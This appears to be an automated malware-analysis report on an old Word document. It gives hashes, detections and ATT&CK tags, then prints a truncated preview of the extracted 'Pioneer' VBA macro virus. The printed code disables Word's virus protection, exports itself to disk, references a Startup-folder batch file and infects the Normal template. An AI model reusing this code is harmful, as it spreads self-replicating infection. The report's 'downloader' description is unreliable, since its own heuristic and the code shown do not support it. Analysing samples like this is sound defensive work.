Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4be61157efe87d20…

MALICIOUS

Office (OLE)

58.0 KB Created: 2000-03-06 16:40:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 74f7fb3e2f3f53a060948c73f6ea874d SHA-1: c8a43260f3093b8db5574c9d5209f495d22dbc1e SHA-256: 4be61157efe87d20f94ec3dbd60c20405350972e88d45956241266ae6b666b6f
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, specifically an Auto_Close macro, which is a common technique for executing malicious code upon document closure. The macro attempts to export its own code to 'c:\Pioneer.sys', suggesting it acts as a downloader for a second-stage payload. The ClamAV detection further confirms its malicious nature.

Heuristics 4

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 46237 bytes
SHA-256: a87bf2d323674b9abe63916d611aa8cae531acd6a8c2a6c7a81c7db31fec31f9
Detection
ClamAV: Doc.Trojan.VMPCK1-10
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Pioneer"
    
Public Skip As Integer
    
    
Sub Pioneer()
' England Beamzket Naro Naro
On Error Resume Next
Dim angel
Randomize
Randomize
f16923 = u10383 & c14831 & k13034 & m10383
f16923 = m10383 & c14831 & Int(Rnd * 9900)
k2003 = m3089 & e5197
f3746 = m3089 & c3454 & Int(Rnd * 978)
f7091 = u7587 & c7612 & Int(Rnd * 4227)
f7091 = m7587 & c7612 & Int(Rnd * 392)
f12006 = m8985 & c11222 & Int(Rnd * 5146)
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.VBE.ActiveVBProject.VBComponents("Pioneer").Export "c:\Pioneer.sys"
f8782 = u2853 & c8298 & Int(Rnd * 619)
f8782 = m2853 & c8298 & Int(Rnd * 2829)
f12936 = u5220 & c2956 & Int(Rnd * 2423)
f12936 = m5220 & c2956 & Int(Rnd * 1610)
k12223 = m17101 & e7338
f12472 = m17101 & c7089 & Int(Rnd * 8377)
ActiveDocument.ReadOnlyRecommended = False
k11439 = m9977 & e11880
f10626 = m9977 & c12693 & Int(Rnd * 604)
f5876 = m15783 & c11864 & Int(Rnd * 6340)
f9173 = u11442 & c14476 & k10255 & m11442
f9173 = m11442 & c14476 & Int(Rnd * 2359)
f4900 = u10710 & c18584 & Int(Rnd * 9967)
f4900 = m10710 & c18584 & Int(Rnd * 6481)
f6294 = u15061 & c16184 & k11563 & m15061
f6294 = m15061 & c16184 & Int(Rnd * 6177)
check = Int(Rnd * 1000)
If check = 3 Then Call p1782
f11828 = u16436 & c9370 & Int(Rnd * 5219)
f11828 = m16436 & c9370 & Int(Rnd * 9501)
f14269 = u5389 & c9937 & Int(Rnd * 4257)
f14269 = m5389 & c9937 & Int(Rnd * 2758)
k13474 = m8410 & e13003
f14376 = m8410 & c12101 & Int(Rnd * 4701)
k15689 = m4239 & e5015
f9008 = m4239 & c11696 & Int(Rnd * 1868)
 f6488$ = "c:\windows\startm~1\programs\startup\msfile.bat"
f16638 = u4814 & c817 & k7533 & m4814
f16638 = m4814 & c817 & Int(Rnd * 2313)
f16412 = u3428 & c7419 & Int(Rnd * 7993)
f16412 = m3428 & c7419 & Int(Rnd * 3274)
a17827974 = GetAttr(NormalTemplate.FullName)
f12710 = m3834 & c9557 & Int(Rnd * 2571)
f8769 = m17507 & c9226 & Int(Rnd * 7675)
If a17827974 = vbReadOnly And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vTagSR(f6488$)
f6686 = u13651 & c12362 & Int(Rnd * 757)
f6686 = m13651 & c12362 & Int(Rnd * 5707)
f5604 = m5558 & c6921 & Int(Rnd * 3906)
If a17827974 = vbReadOnly + vbArchive And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vTagSR(f6488$)
k14724 = m9718 & e8669
f16280 = m9718 & c7113 & Int(Rnd * 1024)
f17387 = u8500 & c10698 & Int(Rnd * 8806)
f17387 = m8500 & c10698 & Int(Rnd * 3132)
If a17827974 = vbReadOnly Then GoTo littlekitty
f15589 = m10214 & c7849 & Int(Rnd * 8752)
k752 = m11781 & e9530
f1841 = m11781 & c8441 & Int(Rnd * 4655)
If a17827974 = vbReadOnly + vbArchive Then GoTo littlekitty
f8709 = u13325 & c8609 & Int(Rnd * 204)
f8709 = m13325 & c8609 & Int(Rnd * 9126)
f3056 = u13584 & c14189 & k10064 & m13584
f3056 = m13584 & c14189 & Int(Rnd * 8706)
f11429 = u9647 & c3706 & Int(Rnd * 2633)
f11429 = m9647 & c3706 & Int(Rnd * 893)
f5013 = m10876 & c10333 & Int(Rnd * 4499)
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "Pioneer" Then qq797419157 = True
Next I
f9882 = m13434 & c12396 & Int(Rnd * 5858)
f5655 = u11540 & c8051 & Int(Rnd * 4852)
f5655 = m11540 & c8051 & Int(Rnd * 3375)
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "Pioneer" Then VtietagSR19151 = True
Next I
k12871 = m8024 & e18520
f16239 = m8024 & c15152 & Int(Rnd * 3704)
f7156 = u8914 & c7814 & Int(Rnd * 3289)
f7156 = m8914 & c7814 & Int(Rnd * 5014)
If qq797419157 = True And VtietagSR19151 = False Then Set t1915797410 = NormalTemplate.VBProject.VBComponents
If qq797419157 = False And VtietagSR19151 = True Then Set t19
... (truncated)